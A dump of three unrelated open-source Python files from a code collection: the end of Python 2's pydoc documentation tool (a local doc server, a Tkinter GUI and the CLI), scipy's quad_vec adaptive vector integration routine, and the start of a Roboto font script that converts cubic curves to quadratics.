class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
                        desc = module.__doc__.splitlines()[0] if module.__doc__ else ''
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
def onerror(modname):
# Ignore non-ImportError exceptions raised whilst trying to
# import modules
pass
try: import warnings
except ImportError: pass
else: warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee &lt;ping@lfw.org&gt;</font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
        # file and the root is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w')
writing = 0
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-k':
apropos(val)
return
if opt == '-p':
try:
port = int(val)
except ValueError:
raise BadUsage
def ready(server):
print 'pydoc server ready at %s' % server.url
def stopped():
print 'pydoc server stopped'
serve(port, ready, stopped)
return
if opt == '-w':
writing = 1
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print 'file %r does not exist' % arg
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport, value:
print value
except (getopt.error, BadUsage):
cmd = os.path.basename(sys.argv[0])
print """pydoc - the Python documentation tool
%s <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '%s', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
%s -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
%s -p <port>
Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
| apache-2.0 |
tylerjereddy/scipy | scipy/integrate/_quad_vec.py | 12 | 20691 | import sys
import copy
import heapq
import collections
import functools
import numpy as np
from scipy._lib._util import MapWrapper
class LRUDict(collections.OrderedDict):
def __init__(self, max_size):
self.__max_size = max_size
def __setitem__(self, key, value):
existing_key = (key in self)
super().__setitem__(key, value)
if existing_key:
self.move_to_end(key)
elif len(self) > self.__max_size:
self.popitem(last=False)
def update(self, other):
# Not needed below
raise NotImplementedError()
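# A minimal usage sketch of the LRU behaviour above (hypothetical values):
# re-setting an existing key refreshes it, while the least recently set
# key is evicted once the size cap is exceeded.
#
#   >>> d = LRUDict(max_size=2)
#   >>> d['a'] = 1; d['b'] = 2; d['c'] = 3   # 'a' falls out
#   >>> list(d.keys())
#   ['b', 'c']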
class SemiInfiniteFunc:
"""
Argument transform from (start, +-oo) to (0, 1)
"""
def __init__(self, func, start, infty):
self._func = func
self._start = start
self._sgn = -1 if infty < 0 else 1
# Overflow threshold for the 1/t**2 factor
self._tmin = sys.float_info.min**0.5
def get_t(self, x):
z = self._sgn * (x - self._start) + 1
if z == 0:
# Can happen only if point not in range
return np.inf
return 1 / z
def __call__(self, t):
if t < self._tmin:
return 0.0
else:
x = self._start + self._sgn * (1 - t) / t
f = self._func(x)
return self._sgn * (f / t) / t
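# The transform used above is x = start + sgn*(1 - t)/t, i.e.
# t = 1/(sgn*(x - start) + 1), which maps (start, sgn*inf) onto (0, 1)
# with dx = -sgn/t**2 dt; that substitution is where the sgn*(f/t)/t
# integrand comes from.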
class DoubleInfiniteFunc:
"""
Argument transform from (-oo, oo) to (-1, 1)
"""
def __init__(self, func):
self._func = func
# Overflow threshold for the 1/t**2 factor
self._tmin = sys.float_info.min**0.5
def get_t(self, x):
s = -1 if x < 0 else 1
return s / (abs(x) + 1)
def __call__(self, t):
if abs(t) < self._tmin:
return 0.0
else:
x = (1 - abs(t)) / t
f = self._func(x)
return (f / t) / t
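# Similarly, this transform uses x = (1 - |t|)/t for t in (-1, 1), so
# t = sign(x)/(|x| + 1) and |dx/dt| = 1/t**2 on both half-axes, giving
# the (f/t)/t integrand above.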
def _max_norm(x):
return np.amax(abs(x))
def _get_sizeof(obj):
try:
return sys.getsizeof(obj)
except TypeError:
# occurs on pypy
if hasattr(obj, '__sizeof__'):
return int(obj.__sizeof__())
return 64
class _Bunch:
def __init__(self, **kwargs):
self.__keys = kwargs.keys()
self.__dict__.update(**kwargs)
def __repr__(self):
return "_Bunch({})".format(", ".join("{}={}".format(k, repr(self.__dict__[k]))
for k in self.__keys))
def quad_vec(f, a, b, epsabs=1e-200, epsrel=1e-8, norm='2', cache_size=100e6, limit=10000,
workers=1, points=None, quadrature=None, full_output=False):
r"""Adaptive integration of a vector-valued function.
Parameters
----------
f : callable
Vector-valued function f(x) to integrate.
a : float
Initial point.
b : float
Final point.
epsabs : float, optional
Absolute tolerance.
epsrel : float, optional
Relative tolerance.
norm : {'max', '2'}, optional
Vector norm to use for error estimation.
cache_size : int, optional
        Number of bytes to use for memoization.
    limit : float or int, optional
        An upper bound on the number of subintervals used in the adaptive
        algorithm.
workers : int or map-like callable, optional
If `workers` is an integer, part of the computation is done in
parallel subdivided to this many tasks (using
:class:`python:multiprocessing.pool.Pool`).
Supply `-1` to use all cores available to the Process.
Alternatively, supply a map-like callable, such as
:meth:`python:multiprocessing.pool.Pool.map` for evaluating the
population in parallel.
This evaluation is carried out as ``workers(func, iterable)``.
points : list, optional
List of additional breakpoints.
quadrature : {'gk21', 'gk15', 'trapezoid'}, optional
Quadrature rule to use on subintervals.
Options: 'gk21' (Gauss-Kronrod 21-point rule),
'gk15' (Gauss-Kronrod 15-point rule),
'trapezoid' (composite trapezoid rule).
        Default: 'gk21' for finite intervals and 'gk15' for (semi-)infinite intervals.
full_output : bool, optional
Return an additional ``info`` dictionary.
Returns
-------
res : {float, array-like}
Estimate for the result
err : float
Error estimate for the result in the given norm
info : dict
Returned only when ``full_output=True``.
        Info dictionary, an object with the attributes:
success : bool
Whether integration reached target precision.
status : int
Indicator for convergence, success (0),
failure (1), and failure due to rounding error (2).
neval : int
Number of function evaluations.
intervals : ndarray, shape (num_intervals, 2)
Start and end points of subdivision intervals.
integrals : ndarray, shape (num_intervals, ...)
Integral for each interval.
Note that at most ``cache_size`` values are recorded,
            and the array may contain *nan* for missing items.
errors : ndarray, shape (num_intervals,)
Estimated integration error for each interval.
Notes
-----
The algorithm mainly follows the implementation of QUADPACK's
DQAG* algorithms, implementing global error control and adaptive
subdivision.
    The algorithm here differs from the QUADPACK approach in two ways:
Instead of subdividing one interval at a time, the algorithm
subdivides N intervals with largest errors at once. This enables
(partial) parallelization of the integration.
The logic of subdividing "next largest" intervals first is then
not implemented, and we rely on the above extension to avoid
concentrating on "small" intervals only.
The Wynn epsilon table extrapolation is not used (QUADPACK uses it
for infinite intervals). This is because the algorithm here is
    supposed to work on vector-valued functions, in a user-specified
norm, and the extension of the epsilon algorithm to this case does
not appear to be widely agreed. For max-norm, using elementwise
Wynn epsilon could be possible, but we do not do this here with
the hope that the epsilon extrapolation is mainly useful in
special cases.
References
----------
[1] R. Piessens, E. de Doncker, QUADPACK (1983).
Examples
--------
We can compute integrations of a vector-valued function:
>>> from scipy.integrate import quad_vec
    >>> import matplotlib.pyplot as plt
    >>> import numpy as np
>>> alpha = np.linspace(0.0, 2.0, num=30)
>>> f = lambda x: x**alpha
>>> x0, x1 = 0, 2
>>> y, err = quad_vec(f, x0, x1)
>>> plt.plot(alpha, y)
>>> plt.xlabel(r"$\alpha$")
>>> plt.ylabel(r"$\int_{0}^{2} x^\alpha dx$")
>>> plt.show()
"""
a = float(a)
b = float(b)
# Use simple transformations to deal with integrals over infinite
# intervals.
kwargs = dict(epsabs=epsabs,
epsrel=epsrel,
norm=norm,
cache_size=cache_size,
limit=limit,
workers=workers,
points=points,
quadrature='gk15' if quadrature is None else quadrature,
full_output=full_output)
if np.isfinite(a) and np.isinf(b):
f2 = SemiInfiniteFunc(f, start=a, infty=b)
if points is not None:
kwargs['points'] = tuple(f2.get_t(xp) for xp in points)
return quad_vec(f2, 0, 1, **kwargs)
elif np.isfinite(b) and np.isinf(a):
f2 = SemiInfiniteFunc(f, start=b, infty=a)
if points is not None:
kwargs['points'] = tuple(f2.get_t(xp) for xp in points)
res = quad_vec(f2, 0, 1, **kwargs)
return (-res[0],) + res[1:]
elif np.isinf(a) and np.isinf(b):
sgn = -1 if b < a else 1
# NB. explicitly split integral at t=0, which separates
# the positive and negative sides
f2 = DoubleInfiniteFunc(f)
if points is not None:
kwargs['points'] = (0,) + tuple(f2.get_t(xp) for xp in points)
else:
kwargs['points'] = (0,)
if a != b:
res = quad_vec(f2, -1, 1, **kwargs)
else:
res = quad_vec(f2, 1, 1, **kwargs)
return (res[0]*sgn,) + res[1:]
elif not (np.isfinite(a) and np.isfinite(b)):
raise ValueError("invalid integration bounds a={}, b={}".format(a, b))
norm_funcs = {
None: _max_norm,
'max': _max_norm,
'2': np.linalg.norm
}
if callable(norm):
norm_func = norm
else:
norm_func = norm_funcs[norm]
parallel_count = 128
min_intervals = 2
try:
_quadrature = {None: _quadrature_gk21,
'gk21': _quadrature_gk21,
'gk15': _quadrature_gk15,
'trapz': _quadrature_trapezoid, # alias for backcompat
'trapezoid': _quadrature_trapezoid}[quadrature]
except KeyError as e:
raise ValueError("unknown quadrature {!r}".format(quadrature)) from e
# Initial interval set
if points is None:
initial_intervals = [(a, b)]
else:
prev = a
initial_intervals = []
for p in sorted(points):
p = float(p)
if not (a < p < b) or p == prev:
continue
initial_intervals.append((prev, p))
prev = p
initial_intervals.append((prev, b))
global_integral = None
global_error = None
rounding_error = None
interval_cache = None
intervals = []
neval = 0
for x1, x2 in initial_intervals:
ig, err, rnd = _quadrature(x1, x2, f, norm_func)
neval += _quadrature.num_eval
if global_integral is None:
if isinstance(ig, (float, complex)):
# Specialize for scalars
if norm_func in (_max_norm, np.linalg.norm):
norm_func = abs
global_integral = ig
global_error = float(err)
rounding_error = float(rnd)
cache_count = cache_size // _get_sizeof(ig)
interval_cache = LRUDict(cache_count)
else:
global_integral += ig
global_error += err
rounding_error += rnd
interval_cache[(x1, x2)] = copy.copy(ig)
intervals.append((-err, x1, x2))
heapq.heapify(intervals)
CONVERGED = 0
NOT_CONVERGED = 1
ROUNDING_ERROR = 2
NOT_A_NUMBER = 3
status_msg = {
CONVERGED: "Target precision reached.",
NOT_CONVERGED: "Target precision not reached.",
ROUNDING_ERROR: "Target precision could not be reached due to rounding error.",
NOT_A_NUMBER: "Non-finite values encountered."
}
# Process intervals
with MapWrapper(workers) as mapwrapper:
ier = NOT_CONVERGED
while intervals and len(intervals) < limit:
# Select intervals with largest errors for subdivision
tol = max(epsabs, epsrel*norm_func(global_integral))
to_process = []
err_sum = 0
for j in range(parallel_count):
if not intervals:
break
if j > 0 and err_sum > global_error - tol/8:
# avoid unnecessary parallel splitting
break
interval = heapq.heappop(intervals)
neg_old_err, a, b = interval
old_int = interval_cache.pop((a, b), None)
to_process.append(((-neg_old_err, a, b, old_int), f, norm_func, _quadrature))
err_sum += -neg_old_err
# Subdivide intervals
for dint, derr, dround_err, subint, dneval in mapwrapper(_subdivide_interval, to_process):
neval += dneval
global_integral += dint
global_error += derr
rounding_error += dround_err
for x in subint:
x1, x2, ig, err = x
interval_cache[(x1, x2)] = ig
heapq.heappush(intervals, (-err, x1, x2))
# Termination check
if len(intervals) >= min_intervals:
tol = max(epsabs, epsrel*norm_func(global_integral))
if global_error < tol/8:
ier = CONVERGED
break
if global_error < rounding_error:
ier = ROUNDING_ERROR
break
if not (np.isfinite(global_error) and np.isfinite(rounding_error)):
ier = NOT_A_NUMBER
break
res = global_integral
err = global_error + rounding_error
if full_output:
res_arr = np.asarray(res)
dummy = np.full(res_arr.shape, np.nan, dtype=res_arr.dtype)
integrals = np.array([interval_cache.get((z[1], z[2]), dummy)
for z in intervals], dtype=res_arr.dtype)
errors = np.array([-z[0] for z in intervals])
intervals = np.array([[z[1], z[2]] for z in intervals])
info = _Bunch(neval=neval,
success=(ier == CONVERGED),
status=ier,
message=status_msg[ier],
intervals=intervals,
integrals=integrals,
errors=errors)
return (res, err, info)
else:
return (res, err)
def _subdivide_interval(args):
interval, f, norm_func, _quadrature = args
old_err, a, b, old_int = interval
c = 0.5 * (a + b)
# Left-hand side
if getattr(_quadrature, 'cache_size', 0) > 0:
f = functools.lru_cache(_quadrature.cache_size)(f)
s1, err1, round1 = _quadrature(a, c, f, norm_func)
dneval = _quadrature.num_eval
s2, err2, round2 = _quadrature(c, b, f, norm_func)
dneval += _quadrature.num_eval
if old_int is None:
old_int, _, _ = _quadrature(a, b, f, norm_func)
dneval += _quadrature.num_eval
if getattr(_quadrature, 'cache_size', 0) > 0:
dneval = f.cache_info().misses
dint = s1 + s2 - old_int
derr = err1 + err2 - old_err
dround_err = round1 + round2
subintervals = ((a, c, s1, err1), (c, b, s2, err2))
return dint, derr, dround_err, subintervals, dneval
def _quadrature_trapezoid(x1, x2, f, norm_func):
"""
Composite trapezoid quadrature
"""
x3 = 0.5*(x1 + x2)
f1 = f(x1)
f2 = f(x2)
f3 = f(x3)
s2 = 0.25 * (x2 - x1) * (f1 + 2*f3 + f2)
round_err = 0.25 * abs(x2 - x1) * (float(norm_func(f1))
+ 2*float(norm_func(f3))
+ float(norm_func(f2))) * 2e-16
s1 = 0.5 * (x2 - x1) * (f1 + f2)
err = 1/3 * float(norm_func(s1 - s2))
return s2, err, round_err
_quadrature_trapezoid.cache_size = 3 * 3
_quadrature_trapezoid.num_eval = 3
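# The error returned above is a standard Richardson-type estimate: the
# trapezoid rule has O(h**2) error, so halving the step cuts the error
# roughly fourfold and abs(I - s2) is approximately abs(s1 - s2)/3.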
def _quadrature_gk(a, b, f, norm_func, x, w, v):
"""
Generic Gauss-Kronrod quadrature
"""
fv = [0.0]*len(x)
c = 0.5 * (a + b)
h = 0.5 * (b - a)
# Gauss-Kronrod
s_k = 0.0
s_k_abs = 0.0
for i in range(len(x)):
ff = f(c + h*x[i])
fv[i] = ff
vv = v[i]
# \int f(x)
s_k += vv * ff
# \int |f(x)|
s_k_abs += vv * abs(ff)
# Gauss
s_g = 0.0
for i in range(len(w)):
s_g += w[i] * fv[2*i + 1]
# Quadrature of abs-deviation from average
s_k_dabs = 0.0
y0 = s_k / 2.0
for i in range(len(x)):
# \int |f(x) - y0|
s_k_dabs += v[i] * abs(fv[i] - y0)
# Use similar error estimation as quadpack
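    # (The min(1, (200*err/dabs)**1.5) damping below mirrors QUADPACK's
    # heuristic: the raw Gauss vs. Kronrod difference is trusted only when
    # it is small relative to the variation of f on the interval.)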
err = float(norm_func((s_k - s_g) * h))
dabs = float(norm_func(s_k_dabs * h))
if dabs != 0 and err != 0:
err = dabs * min(1.0, (200 * err / dabs)**1.5)
eps = sys.float_info.epsilon
round_err = float(norm_func(50 * eps * h * s_k_abs))
if round_err > sys.float_info.min:
err = max(err, round_err)
return h * s_k, err, round_err
def _quadrature_gk21(a, b, f, norm_func):
"""
Gauss-Kronrod 21 quadrature with error estimate
"""
# Gauss-Kronrod points
x = (0.995657163025808080735527280689003,
0.973906528517171720077964012084452,
0.930157491355708226001207180059508,
0.865063366688984510732096688423493,
0.780817726586416897063717578345042,
0.679409568299024406234327365114874,
0.562757134668604683339000099272694,
0.433395394129247190799265943165784,
0.294392862701460198131126603103866,
0.148874338981631210884826001129720,
0,
-0.148874338981631210884826001129720,
-0.294392862701460198131126603103866,
-0.433395394129247190799265943165784,
-0.562757134668604683339000099272694,
-0.679409568299024406234327365114874,
-0.780817726586416897063717578345042,
-0.865063366688984510732096688423493,
-0.930157491355708226001207180059508,
-0.973906528517171720077964012084452,
-0.995657163025808080735527280689003)
# 10-point weights
w = (0.066671344308688137593568809893332,
0.149451349150580593145776339657697,
0.219086362515982043995534934228163,
0.269266719309996355091226921569469,
0.295524224714752870173892994651338,
0.295524224714752870173892994651338,
0.269266719309996355091226921569469,
0.219086362515982043995534934228163,
0.149451349150580593145776339657697,
0.066671344308688137593568809893332)
# 21-point weights
v = (0.011694638867371874278064396062192,
0.032558162307964727478818972459390,
0.054755896574351996031381300244580,
0.075039674810919952767043140916190,
0.093125454583697605535065465083366,
0.109387158802297641899210590325805,
0.123491976262065851077958109831074,
0.134709217311473325928054001771707,
0.142775938577060080797094273138717,
0.147739104901338491374841515972068,
0.149445554002916905664936468389821,
0.147739104901338491374841515972068,
0.142775938577060080797094273138717,
0.134709217311473325928054001771707,
0.123491976262065851077958109831074,
0.109387158802297641899210590325805,
0.093125454583697605535065465083366,
0.075039674810919952767043140916190,
0.054755896574351996031381300244580,
0.032558162307964727478818972459390,
0.011694638867371874278064396062192)
return _quadrature_gk(a, b, f, norm_func, x, w, v)
_quadrature_gk21.num_eval = 21
def _quadrature_gk15(a, b, f, norm_func):
"""
Gauss-Kronrod 15 quadrature with error estimate
"""
# Gauss-Kronrod points
x = (0.991455371120812639206854697526329,
0.949107912342758524526189684047851,
0.864864423359769072789712788640926,
0.741531185599394439863864773280788,
0.586087235467691130294144838258730,
0.405845151377397166906606412076961,
0.207784955007898467600689403773245,
0.000000000000000000000000000000000,
-0.207784955007898467600689403773245,
-0.405845151377397166906606412076961,
-0.586087235467691130294144838258730,
-0.741531185599394439863864773280788,
-0.864864423359769072789712788640926,
-0.949107912342758524526189684047851,
-0.991455371120812639206854697526329)
# 7-point weights
w = (0.129484966168869693270611432679082,
0.279705391489276667901467771423780,
0.381830050505118944950369775488975,
0.417959183673469387755102040816327,
0.381830050505118944950369775488975,
0.279705391489276667901467771423780,
0.129484966168869693270611432679082)
# 15-point weights
v = (0.022935322010529224963732008058970,
0.063092092629978553290700663189204,
0.104790010322250183839876322541518,
0.140653259715525918745189590510238,
0.169004726639267902826583426598550,
0.190350578064785409913256402421014,
0.204432940075298892414161999234649,
0.209482141084727828012999174891714,
0.204432940075298892414161999234649,
0.190350578064785409913256402421014,
0.169004726639267902826583426598550,
0.140653259715525918745189590510238,
0.104790010322250183839876322541518,
0.063092092629978553290700663189204,
0.022935322010529224963732008058970)
return _quadrature_gk(a, b, f, norm_func, x, w, v)
_quadrature_gk15.num_eval = 15
| bsd-3-clause |
anthrotype/roboto | scripts/lib/fontbuild/convertCurves.py | 7 | 3436 | #! /usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Converts a cubic bezier curve to a quadratic spline with
exactly two off curve points.
"""
import numpy
from numpy import array,cross,dot
from fontTools.misc import bezierTools
from robofab.objects.objectsRF import RSegment
def replaceSegments(contour, segments):
while len(contour):
contour.removeSegment(0)
for s in segments:
contour.appendSegment(s.type, [(p.x, p.y) for p in s.points], s.smooth)
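# calcIntersect returns the intersection of the infinite lines through
# (a, b) and (c, d): with e = b - a, f = d - c and p perpendicular to e,
# solving (c + h*f - a) . p = 0 for h gives h = ((a - c) . p) / (f . p).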
def calcIntersect(a,b,c,d):
numpy.seterr(all='raise')
e = b-a
f = d-c
p = array([-e[1], e[0]])
try:
h = dot((a-c),p) / dot(f,p)
except:
print a,b,c,d
raise
return c + dot(f,h)
def simpleConvertToQuadratic(p0,p1,p2,p3):
    p = [array([i.x, i.y]) for i in [p0, p1, p2, p3]]
    off = calcIntersect(p[0], p[1], p[2], p[3])
    # Assumed return shape for this otherwise unused helper: both cubic
    # handles collapse to the single intersection point computed above.
    return (p[0], off, p[3])
# OFFCURVE_VECTOR_CORRECTION = -.015
OFFCURVE_VECTOR_CORRECTION = 0
def convertToQuadratic(p0,p1,p2,p3):
# TODO: test for accuracy and subdivide further if needed
p = [(i.x,i.y) for i in [p0,p1,p2,p3]]
# if p[0][0] == p[1][0] and p[0][0] == p[2][0] and p[0][0] == p[2][0] and p[0][0] == p[3][0]:
# return (p[0],p[1],p[2],p[3])
# if p[0][1] == p[1][1] and p[0][1] == p[2][1] and p[0][1] == p[2][1] and p[0][1] == p[3][1]:
# return (p[0],p[1],p[2],p[3])
seg1,seg2 = bezierTools.splitCubicAtT(p[0], p[1], p[2], p[3], .5)
pts1 = [array([i[0], i[1]]) for i in seg1]
pts2 = [array([i[0], i[1]]) for i in seg2]
on1 = seg1[0]
on2 = seg2[3]
try:
off1 = calcIntersect(pts1[0], pts1[1], pts1[2], pts1[3])
off2 = calcIntersect(pts2[0], pts2[1], pts2[2], pts2[3])
except:
return (p[0],p[1],p[2],p[3])
off1 = (on1 - off1) * OFFCURVE_VECTOR_CORRECTION + off1
off2 = (on2 - off2) * OFFCURVE_VECTOR_CORRECTION + off2
return (on1,off1,off2,on2)
def cubicSegmentToQuadratic(c,sid):
segment = c[sid]
if (segment.type != "curve"):
print "Segment type not curve"
return
#pSegment,junk = getPrevAnchor(c,sid)
    pSegment = c[sid-1]  # assumes that a curve type will always be preceded by another point on the same contour
